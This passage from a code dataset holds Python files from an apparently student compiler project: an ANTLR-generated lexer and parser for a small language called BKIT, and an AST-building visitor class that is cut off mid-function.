"avg_line_length": 31.527273178100586, "blob_id": "c42cc0a84b8b62ffa6f6fa5490821db61004dcad", "content_id": "03c2a0b25dd5cec0f5bede3adc089a2416875d0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1791, "license_type": "no_license", "max_line_length": 103, "num_lines": 55, "path": "/target/LexicalAnalysisLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from LexicalAnalysis.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\n\tfrom lexererr import *;\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2\\4\")\n buf.write(\"\\31\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\3\\2\\3\\2\\3\\3\\3\")\n buf.write(\"\\3\\3\\4\\6\\4\\21\\n\\4\\r\\4\\16\\4\\22\\3\\5\\6\\5\\26\\n\\5\\r\\5\\16\\5\")\n 
buf.write(\"\\27\\2\\2\\6\\3\\2\\5\\2\\7\\3\\t\\4\\3\\2\\5\\3\\2c|\\3\\2\\62;\\5\\2\\13\\f\")\n buf.write(\"\\17\\17\\\"\\\"\\2\\30\\2\\7\\3\\2\\2\\2\\2\\t\\3\\2\\2\\2\\3\\13\\3\\2\\2\\2\\5\")\n buf.write(\"\\r\\3\\2\\2\\2\\7\\20\\3\\2\\2\\2\\t\\25\\3\\2\\2\\2\\13\\f\\t\\2\\2\\2\\f\\4\")\n buf.write(\"\\3\\2\\2\\2\\r\\16\\t\\3\\2\\2\\16\\6\\3\\2\\2\\2\\17\\21\\5\\3\\2\\2\\20\\17\")\n buf.write(\"\\3\\2\\2\\2\\21\\22\\3\\2\\2\\2\\22\\20\\3\\2\\2\\2\\22\\23\\3\\2\\2\\2\\23\")\n buf.write(\"\\b\\3\\2\\2\\2\\24\\26\\t\\4\\2\\2\\25\\24\\3\\2\\2\\2\\26\\27\\3\\2\\2\\2\\27\")\n buf.write(\"\\25\\3\\2\\2\\2\\27\\30\\3\\2\\2\\2\\30\\n\\3\\2\\2\\2\\5\\2\\22\\27\\2\")\n return buf.getvalue()\n\n\nclass LexicalAnalysisLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n ID = 1\n WS = 2\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n ]\n\n symbolicNames = [ \"<INVALID>\",\n \"ID\", \"WS\" ]\n\n ruleNames = [ \"LETTER\", \"NUMBER\", \"ID\", \"WS\" ]\n\n grammarFileName = \"LexicalAnalysis.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n" }, { "alpha_fraction": 0.5208368897438049, "alphanum_fraction": 0.5554218888282776, "avg_line_length": 31.592437744140625, "blob_id": "d8a0ad41de03fcaeb3b3beeff62ad83d38343613", "content_id": "e113ec12161d441d400d91b953d910081ec95769", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23276, "license_type": "no_license", "max_line_length": 407, "num_lines": 714, "path": "/SyntaxAnalysis/src/main/bkit/parser/.antlr/BKITParser.py", "repo_name": "signofthefour/PPL", 
"src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/SyntaxAnalysis/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3E\")\n buf.write(\"A\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\\4\\b\")\n buf.write(\"\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\3\\2\\3\\2\")\n buf.write(\"\\6\\2\\35\\n\\2\\r\\2\\16\\2\\36\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\")\n buf.write(\"\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\5\\3\\5\\3\\6\\3\\6\\3\\7\\3\\7\\3\\b\")\n buf.write(\"\\3\\b\\3\\t\\3\\t\\3\\n\\3\\n\\3\\13\\3\\13\\3\\f\\3\\f\\3\\r\\3\\r\\3\\r\\2\\2\")\n buf.write(\"\\16\\2\\4\\6\\b\\n\\f\\16\\20\\22\\24\\26\\30\\2\\6\\3\\2\\13\\16\\3\\2-/\")\n buf.write(\"\\b\\2$$&&((**,,\\60\\65\\7\\2%%\\'\\'))++\\66:\\2\\66\\2\\34\\3\\2\\2\")\n buf.write(\"\\2\\4\\\"\\3\\2\\2\\2\\6%\\3\\2\\2\\2\\b.\\3\\2\\2\\2\\n\\60\\3\\2\\2\\2\\f\\62\")\n buf.write(\"\\3\\2\\2\\2\\16\\64\\3\\2\\2\\2\\20\\66\\3\\2\\2\\2\\228\\3\\2\\2\\2\\24:\\3\")\n buf.write(\"\\2\\2\\2\\26<\\3\\2\\2\\2\\30>\\3\\2\\2\\2\\32\\35\\5\\4\\3\\2\\33\\35\\5\\6\")\n buf.write(\"\\4\\2\\34\\32\\3\\2\\2\\2\\34\\33\\3\\2\\2\\2\\35\\36\\3\\2\\2\\2\\36\\34\\3\")\n buf.write(\"\\2\\2\\2\\36\\37\\3\\2\\2\\2\\37 \\3\\2\\2\\2 !\\7\\2\\2\\3!\\3\\3\\2\\2\\2\")\n buf.write(\"\\\"#\\7\\37\\2\\2#$\\7C\\2\\2$\\5\\3\\2\\2\\2%&\\7\\32\\2\\2&\\'\\7A\\2\\2\")\n buf.write(\"\\'(\\7\\4\\2\\2()\\7\\34\\2\\2)*\\7\\17\\2\\2*+\\7A\\2\\2+,\\7\\26\\2\\2\")\n buf.write(\",-\\7B\\2\\2-\\7\\3\\2\\2\\2./\\t\\2\\2\\2/\\t\\3\\2\\2\\2\\60\\61\\5\\f\\7\")\n buf.write(\"\\2\\61\\13\\3\\2\\2\\2\\62\\63\\3\\2\\2\\2\\63\\r\\3\\2\\2\\2\\64\\65\\t\\3\")\n 
buf.write(\"\\2\\2\\65\\17\\3\\2\\2\\2\\66\\67\\t\\4\\2\\2\\67\\21\\3\\2\\2\\289\\t\\5\\2\")\n buf.write(\"\\29\\23\\3\\2\\2\\2:;\\3\\2\\2\\2;\\25\\3\\2\\2\\2<=\\3\\2\\2\\2=\\27\\3\\2\")\n buf.write(\"\\2\\2>?\\3\\2\\2\\2?\\31\\3\\2\\2\\2\\4\\34\\36\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \n \"'Else'\", \"'ElSelf'\", \"'ElseIf'\", \"'EndIf'\", \"'EndFor'\", \n \"'EndWhile'\", \"'For'\", \"'Function'\", \"'If'\", \"'Parameter'\", \n \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \"'True'\", \n \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \n \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \n \"'||'\", \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \n \"'=\\\\='\", \"'<.'\", \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \n \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \"';'\", \n \"','\", \"'='\" ]\n\n symbolicNames = [ \"<INVALID>\", \"INT_ARRAY\", \"ID\", \"ILLEGAL_ESCAPE\", \n \"UNCLOSE_STRING\", \"COMMENT\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\", \"WS\", \"Integer_literal\", \"Float_literal\", \n \"Boolean_literal\", \"String_literal\", \"BODY\", \"BREAK\", \n \"CONTINUE\", \"DO\", \"ELSE\", \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \n \"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \n \"STAR_INT\", \"STAR_FLOAT\", 
\"DIV_INT\", \"DIV_FLOAT\", \n \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \n \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PARENT\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\" ]\n\n RULE_program = 0\n RULE_var_declare = 1\n RULE_function_declare = 2\n RULE_primitive_type = 3\n RULE_composite_type = 4\n RULE_array = 5\n RULE_bool_op = 6\n RULE_int_op = 7\n RULE_float_op = 8\n RULE_if_stmt = 9\n RULE_while_stmt = 10\n RULE_dowhile_stmt = 11\n\n ruleNames = [ \"program\", \"var_declare\", \"function_declare\", \"primitive_type\", \n \"composite_type\", \"array\", \"bool_op\", \"int_op\", \"float_op\", \n \"if_stmt\", \"while_stmt\", \"dowhile_stmt\" ]\n\n EOF = Token.EOF\n INT_ARRAY=1\n ID=2\n ILLEGAL_ESCAPE=3\n UNCLOSE_STRING=4\n COMMENT=5\n UNTERMINATED_COMMENT=6\n ERROR_CHAR=7\n WS=8\n Integer_literal=9\n Float_literal=10\n Boolean_literal=11\n String_literal=12\n BODY=13\n BREAK=14\n CONTINUE=15\n DO=16\n ELSE=17\n ELSELF=18\n ELSEIF=19\n ENDBODY=20\n ENDFOR=21\n ENDWHILE=22\n FOR=23\n FUNCTION=24\n IF=25\n PARAMETER=26\n RETURN=27\n THEN=28\n VAR=29\n WHILE=30\n TRUE=31\n FALSE=32\n ENDDO=33\n PLUS_INT=34\n PLUS_FLOAT=35\n MINUS_INT=36\n MINUS_FLOAT=37\n STAR_INT=38\n STAR_FLOAT=39\n DIV_INT=40\n DIV_FLOAT=41\n MOD=42\n NOT=43\n AND=44\n OR=45\n EQUAL=46\n NOT_EQUAL_INT=47\n LESS_INT=48\n GREATER_INT=49\n LESS_OR_EQUAL_INT=50\n GREATER_OR_EQUAL_INT=51\n NOT_EQUAL_FLOAT=52\n LESS_FLOAT=53\n GREATER_FLOAT=54\n LESS_OR_EQUAL_FLOAT=55\n GREATER_OR_EQUAL_FLOAT=56\n LEFT_PAREN=57\n RIGHT_PARENT=58\n LEFT_BRACKET=59\n RIGHT_BRACKET=60\n LEFT_BRACE=61\n RIGHT_BRACE=62\n COLON=63\n DOT=64\n SEMI=65\n COMMA=66\n ASSIGN=67\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n 
super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def function_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Function_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Function_declareContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 26 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 26\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.VAR]:\n self.state = 24\n self.var_declare()\n pass\n elif token in [BKITParser.FUNCTION]:\n self.state = 25\n self.function_declare()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 28 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.FUNCTION or _la==BKITParser.VAR):\n break\n\n self.state = 30\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declareContext(ParserRuleContext):\n\n def __init__(self, parser, 
parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def VAR(self):\n return self.getToken(BKITParser.VAR, 0)\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare\n\n\n\n\n def var_declare(self):\n\n localctx = BKITParser.Var_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 32\n self.match(BKITParser.VAR)\n self.state = 33\n self.match(BKITParser.SEMI)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FUNCTION(self):\n return self.getToken(BKITParser.FUNCTION, 0)\n\n def COLON(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COLON)\n else:\n return self.getToken(BKITParser.COLON, i)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def PARAMETER(self):\n return self.getToken(BKITParser.PARAMETER, 0)\n\n def BODY(self):\n return self.getToken(BKITParser.BODY, 0)\n\n def ENDBODY(self):\n return self.getToken(BKITParser.ENDBODY, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_declare\n\n\n\n\n def function_declare(self):\n\n localctx = BKITParser.Function_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_function_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 35\n self.match(BKITParser.FUNCTION)\n self.state = 36\n self.match(BKITParser.COLON)\n self.state = 37\n self.match(BKITParser.ID)\n self.state = 38\n 
self.match(BKITParser.PARAMETER)\n self.state = 39\n self.match(BKITParser.BODY)\n self.state = 40\n self.match(BKITParser.COLON)\n self.state = 41\n self.match(BKITParser.ENDBODY)\n self.state = 42\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_typeContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def Integer_literal(self):\n return self.getToken(BKITParser.Integer_literal, 0)\n\n def Float_literal(self):\n return self.getToken(BKITParser.Float_literal, 0)\n\n def String_literal(self):\n return self.getToken(BKITParser.String_literal, 0)\n\n def Boolean_literal(self):\n return self.getToken(BKITParser.Boolean_literal, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_type\n\n\n\n\n def primitive_type(self):\n\n localctx = BKITParser.Primitive_typeContext(self, self._ctx, self.state)\n self.enterRule(localctx, 6, self.RULE_primitive_type)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 44\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.Integer_literal) | (1 << BKITParser.Float_literal) | (1 << BKITParser.Boolean_literal) | (1 << BKITParser.String_literal))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_typeContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n 
def array(self):\n return self.getTypedRuleContext(BKITParser.ArrayContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_type\n\n\n\n\n def composite_type(self):\n\n localctx = BKITParser.Composite_typeContext(self, self._ctx, self.state)\n self.enterRule(localctx, 8, self.RULE_composite_type)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 46\n self.array()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ArrayContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_array\n\n\n\n\n def array(self):\n\n localctx = BKITParser.ArrayContext(self, self._ctx, self.state)\n self.enterRule(localctx, 10, self.RULE_array)\n try:\n self.enterOuterAlt(localctx, 1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Bool_opContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def NOT(self):\n return self.getToken(BKITParser.NOT, 0)\n\n def AND(self):\n return self.getToken(BKITParser.AND, 0)\n\n def OR(self):\n return self.getToken(BKITParser.OR, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_bool_op\n\n\n\n\n def bool_op(self):\n\n localctx = BKITParser.Bool_opContext(self, self._ctx, self.state)\n self.enterRule(localctx, 12, self.RULE_bool_op)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 50\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.NOT) | (1 << 
BKITParser.AND) | (1 << BKITParser.OR))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Int_opContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def PLUS_INT(self):\n return self.getToken(BKITParser.PLUS_INT, 0)\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def STAR_INT(self):\n return self.getToken(BKITParser.STAR_INT, 0)\n\n def DIV_INT(self):\n return self.getToken(BKITParser.DIV_INT, 0)\n\n def MOD(self):\n return self.getToken(BKITParser.MOD, 0)\n\n def EQUAL(self):\n return self.getToken(BKITParser.EQUAL, 0)\n\n def NOT_EQUAL_INT(self):\n return self.getToken(BKITParser.NOT_EQUAL_INT, 0)\n\n def LESS_INT(self):\n return self.getToken(BKITParser.LESS_INT, 0)\n\n def GREATER_INT(self):\n return self.getToken(BKITParser.GREATER_INT, 0)\n\n def LESS_OR_EQUAL_INT(self):\n return self.getToken(BKITParser.LESS_OR_EQUAL_INT, 0)\n\n def GREATER_OR_EQUAL_INT(self):\n return self.getToken(BKITParser.GREATER_OR_EQUAL_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_int_op\n\n\n\n\n def int_op(self):\n\n localctx = BKITParser.Int_opContext(self, self._ctx, self.state)\n self.enterRule(localctx, 14, self.RULE_int_op)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 52\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.PLUS_INT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.STAR_INT) | (1 << BKITParser.DIV_INT) | (1 << BKITParser.MOD) | (1 << BKITParser.EQUAL) | (1 << BKITParser.NOT_EQUAL_INT) | (1 << BKITParser.LESS_INT) | (1 << BKITParser.GREATER_INT) | (1 << 
BKITParser.LESS_OR_EQUAL_INT) | (1 << BKITParser.GREATER_OR_EQUAL_INT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Float_opContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def PLUS_FLOAT(self):\n return self.getToken(BKITParser.PLUS_FLOAT, 0)\n\n def MINUS_FLOAT(self):\n return self.getToken(BKITParser.MINUS_FLOAT, 0)\n\n def STAR_FLOAT(self):\n return self.getToken(BKITParser.STAR_FLOAT, 0)\n\n def DIV_FLOAT(self):\n return self.getToken(BKITParser.DIV_FLOAT, 0)\n\n def NOT_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.NOT_EQUAL_FLOAT, 0)\n\n def LESS_FLOAT(self):\n return self.getToken(BKITParser.LESS_FLOAT, 0)\n\n def GREATER_FLOAT(self):\n return self.getToken(BKITParser.GREATER_FLOAT, 0)\n\n def LESS_OR_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.LESS_OR_EQUAL_FLOAT, 0)\n\n def GREATER_OR_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.GREATER_OR_EQUAL_FLOAT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_float_op\n\n\n\n\n def float_op(self):\n\n localctx = BKITParser.Float_opContext(self, self._ctx, self.state)\n self.enterRule(localctx, 16, self.RULE_float_op)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 54\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.PLUS_FLOAT) | (1 << BKITParser.MINUS_FLOAT) | (1 << BKITParser.STAR_FLOAT) | (1 << BKITParser.DIV_FLOAT) | (1 << BKITParser.NOT_EQUAL_FLOAT) | (1 << BKITParser.LESS_FLOAT) | (1 << BKITParser.GREATER_FLOAT) | (1 << BKITParser.LESS_OR_EQUAL_FLOAT) | (1 << BKITParser.GREATER_OR_EQUAL_FLOAT))) != 0)):\n 
self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class If_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_if_stmt\n\n\n\n\n def if_stmt(self):\n\n localctx = BKITParser.If_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 18, self.RULE_if_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class While_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_while_stmt\n\n\n\n\n def while_stmt(self):\n\n localctx = BKITParser.While_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 20, self.RULE_while_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Dowhile_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_dowhile_stmt\n\n\n\n\n def dowhile_stmt(self):\n\n localctx = BKITParser.Dowhile_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 22, 
self.RULE_dowhile_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n\n\n" }, { "alpha_fraction": 0.6337043642997742, "alphanum_fraction": 0.6419832706451416, "avg_line_length": 42.45199966430664, "blob_id": "7aff4d8914f8c6662f7f376b02c7af84de068fee", "content_id": "5253006b01bfa778f747a97cb07ab59afe06d819", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10871, "license_type": "no_license", "max_line_length": 146, "num_lines": 250, "path": "/Assignments/assignment2/src1.1/main/bkit/astgen/ASTGeneration.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "from BKITVisitor import BKITVisitor\nfrom BKITParser import BKITParser\nfrom AST import *\n# from AST_GEN_TEST import *\nfrom functools import reduce\n\nclass ASTGeneration(BKITVisitor):\n\n def visitProgram(self,ctx:BKITParser.ProgramContext):\n # import pdb; pdb.set_trace()z\n var_decls = list(reduce(lambda y,x: y + self.visitVar_declare(x), [item for item in ctx.var_declare()], []))\n funcs_decls = list(reduce(lambda y,x: y + [self.visitFunction_declare(x)], [item for item in ctx.function_declare()], []))\n return Program(var_decls + funcs_decls)\n\n\n # Visit a parse tree produced by BKITParser#function_declare.\n def visitFunction_declare(self, ctx:BKITParser.Function_declareContext):\n funcName = Id(ctx.ID().getText())\n params = self.visitParams_list(ctx.params_list()) if ctx.params_list() else []\n declare = list(reduce(lambda y, x: y + self.visitVar_declare_stmt(x), ctx.var_declare_stmt(), []))\n stmt = list(reduce(lambda y, x: y + [self.visitStmt(x)], ctx.stmt(), []))\n return FuncDecl(funcName, params, tuple((declare,stmt)))\n\n\n # Visit a parse tree produced by BKITParser#primitive_data.\n def visitPrimitive_data(self, 
ctx:BKITParser.Primitive_dataContext):\n if ctx.INT_LIT():\n return IntLiteral(int(ctx.INT_LIT().getText().lower(), 0))\n if ctx.FLOAT_LIT():\n return FloatLiteral(float(ctx.FLOAT_LIT().getText()))\n if ctx.STRING_LIT():\n return StringLiteral(str(ctx.STRING_LIT().getText()))\n if ctx.BOOL_LIT():\n return BooleanLiteral(ctx.BOOL_LIT().getText() == \"True\")\n\n\n # Visit a parse tree produced by BKITParser#array_lit.\n def visitArray_lit(self, ctx:BKITParser.Array_litContext):\n data = [self.visit(datum) for datum in ctx.children if isinstance(datum, (BKITParser.Primitive_dataContext, BKITParser.Array_litContext))]\n return ArrayLiteral(data)\n\n\n # Visit a parse tree produced by BKITParser#var_list.\n def visitVar_list(self, ctx:BKITParser.Var_listContext):\n var_list = [self.visit(decl) for decl in ctx.children if isinstance(decl,(BKITParser.Var_non_initContext, BKITParser.Var_initContext))]\n return var_list\n\n # Visit a parse tree produced by BKITParser#var_non_init.\n def visitVar_non_init(self, ctx:BKITParser.Var_non_initContext):\n if ctx.getChildCount() == 1:\n return VarDecl(Id(ctx.ID().getText()), [], None)\n else:\n dim = map(lambda x: int(x, 0), [lit.getText() for lit in ctx.INT_LIT()])\n return VarDecl(Id(ctx.ID().getText()), dim, None)\n\n\n # Visit a parse tree produced by BKITParser#var_init.\n def visitVar_init(self, ctx:BKITParser.Var_initContext):\n if ctx.LEFT_BRACKET():\n dim = list(map(lambda x: int(x, 0), [lit.getText() for lit in ctx.INT_LIT()]))\n return VarDecl(Id(ctx.ID().getText()), dim, self.visit(ctx.children[-1]))\n else:\n return VarDecl(Id(ctx.ID().getText()), 